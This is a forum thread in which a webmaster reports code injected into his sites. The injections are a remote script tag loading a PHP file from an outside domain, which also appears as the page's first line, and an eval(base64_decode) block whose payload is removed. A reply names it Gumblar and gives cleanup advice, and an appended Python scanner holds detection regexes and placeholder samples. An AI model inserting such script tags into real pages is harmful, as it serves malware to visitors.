<script src=http://kayserwesner.com/README_FILES/mainbody.php >

  • Thread starter: Warren Smith

Warren Smith

Hi Folks,

It appears I have some type of virus or something that's changing the code
in my websites on my virtual server account. After the head tags the
following code appears

</head><script src=http://kayserwesner.com/README_FILES/mainbody.php
</script>

<body>

Also at the top of the html code I get the following crap. Any ideas. TIA

<?php
eval(base64_decode('[base64 payload removed]'));
?>
 
From: "Warren Smith" <[email protected]>

| Hi Folks,

| It appears I have some type of virus or something that's changing the code
| in my websites on my virtual server account. After the head tags the
| following code appears


| <body>

| Also at the top of the html code I get the following crap. Any ideas. TIA

< snip >

Looks like Gumblar in action.

http://en.wikipedia.org/wiki/Gumblar

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

The site needs to be taken down.

All code pages need to be cleaned.

All passwords should be changed.

All vulnerabilities *must* be mitigated.
 

Might want to also create a Google webmaster account, and verify
ownership/control (Google reports site as malicious).

Also you can find more help at http://badwarebusters.org


John
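
The replies say every code page needs to be cleaned; the first step is finding which files carry the two injections quoted in the original post. The scanner below is an added example, not code from any poster in this thread. Its function names, the extension list and the `trusted_hosts` parameter are assumptions, and the sample data is constructed with a placeholder host.

```python
import re
from pathlib import Path

# Signatures of the two injections quoted in the thread (detection only).
# 1) a remote <script src=...> placed directly after </head>
HEAD_SCRIPT = re.compile(
    rb"</head>\s*<script\b[^>]*?\bsrc\s*=\s*[\"']?(https?://[^\s\"'>]+)", re.I)
# 2) a PHP block that evals base64-decoded data
PHP_EVAL = re.compile(rb"<\?php\s*eval\s*\(\s*base64_decode\s*\(", re.I)

WEB_EXTS = {".php", ".html", ".htm", ".js", ".inc"}  # assumed set of page types

def scan_bytes(data, trusted_hosts=()):
    """Return a list of (kind, detail) findings for one file's contents."""
    findings = []
    for m in HEAD_SCRIPT.finditer(data):
        url = m.group(1).decode("latin-1")
        host = url.split("/")[2].lower()
        if host not in trusted_hosts:
            findings.append(("script-after-head", url))
    for m in PHP_EVAL.finditer(data):
        # Offset 0 matches the post's report of the block at the top of the file.
        findings.append(("php-eval-base64", "offset %d" % m.start()))
    return findings

def scan_tree(root, trusted_hosts=()):
    """Walk a copy of the site and map each affected file to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            found = scan_bytes(path.read_bytes(), trusted_hosts)
            if found:
                report[str(path)] = found
    return report

# Constructed samples mirroring the layout described in the post.
SAMPLE_INFECTED = (
    b"<?php\neval(base64_decode('QUJD'));\n?>\n<html><head><title>x</title>"
    b"</head><script src=http://injected.example/README_FILES/mainbody.php\n"
    b"</script>\n<body></body></html>")
SAMPLE_CLEAN = (b"<html><head><script src='/js/site.js'></script></head>"
                b"<body></body></html>")

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, hits in scan_tree(root).items():
        print(name, hits)
```

Run it against a downloaded copy of the site rather than the live server, and compare flagged files with a known-good backup before restoring.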
 